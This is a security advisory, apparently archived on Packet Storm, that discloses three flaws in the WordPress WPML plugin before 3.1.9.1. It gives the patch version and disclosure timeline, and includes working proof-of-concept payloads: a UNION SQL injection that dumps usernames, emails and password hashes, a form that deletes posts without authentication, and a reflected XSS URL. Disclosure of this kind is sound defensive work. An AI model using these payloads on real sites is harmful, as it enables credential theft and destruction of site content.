what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress WPML XSS / Deletion / SQL Injection

WordPress WPML XSS / Deletion / SQL Injection
Posted Mar 13, 2015
Authored by Jouko Pynnonen | Site klikki.fi

WordPress WPML plugin versions prior to 3.1.9.1 suffer from remote SQL injection, cross site scripting, and page/post/menu deletion vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | ba54a3b1a46db6292b5bd15e0b1a454fed02128f7e7bf7ce3995d4fa7d872962

WordPress WPML XSS / Deletion / SQL Injection

Change Mirror Download
OVERVIEW
==========

WPML is the industry standard for creating multi-lingual WordPress
sites. Three vulnerabilities were found in the plug-in. The most
serious of them, an SQL injection problem, allows anyone to read the
contents of the WordPress database, including user details and
password hashes, without authentication.

System administrators should update to version 3.1.9.1 released
earlier this week to resolve the issues.



DETAILS
========

1. SQL injection

When WPML processed a HTTP POST request containing the parameter
”action=wp-link-ajax”, the current language is determined by parsing
the HTTP referer. The parsed language code is not checked for
validity, nor SQL-escaped. The user doesn’t need to be logged in.

By sending a carefully crafted referer value with the mentioned POST
request parameter, an attacker can perform SQL queries on arbitrary
tables and retrieve their results. In addition to the standard
WordPress database and tables, the attacker may query all other
databases and tables accessible to the web backend.

The following HTML snippet demonstrates the vulnerability:

<script>
var union="select
user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from
wp_users";
if (document.location.search.length < 2)
document.location.search="lang=xx' UNION "+union+" -- -- ";
</script>

<form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed">
<input type=hidden name=action value="wp-link-ajax">
<input type=submit>
</form>

The results of the SQL query will be shown in the comments feed XML-formatted.



2. Page/post/menu deletion

WPML contains a ”menu sync” function which helps site administrators
to keep WordPress menus consistent across different languages. This
functionality lacked any access control, allowing anyone to delete
practically all content of the website - posts, pages, and menus.

Example:

<form method=POST
action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php">
<input type=hidden name="action" value="icl_msync_confirm">
<input type=text name="sync" size=50 value="del[x][y][12345]=z">
<input type=submit>
</form>

Submitting the above form would delete the row with the ID 12345 in
the wp_posts database. Several items be deleted with the same request.



3. Reflected XSS

The ”reminder popup” code intended for administrators in WPML didn’t
check for login status or nonce. An attacker can direct target users
to an URL like:

https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f


to execute JavaScript in their browser. This example bypasses the
Chrome XSS Auditor.

In the case of WordPress, XSS triggered by an administrator can lead
to server-side compromise via the plugin and theme editors.



CREDITS
========

The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while
researching WordPress plugins falling in the scope of the Facebook bug
bounty program.

The vendor was notified on March 02, 2015 and the patch was released
on March 10.

Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/

An up-to-date version of this document can be found on our website
http://klikki.fi .


--
Jouko Pynnönen <jouko@iki.fi>
Klikki Oy - http://klikki.fi
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close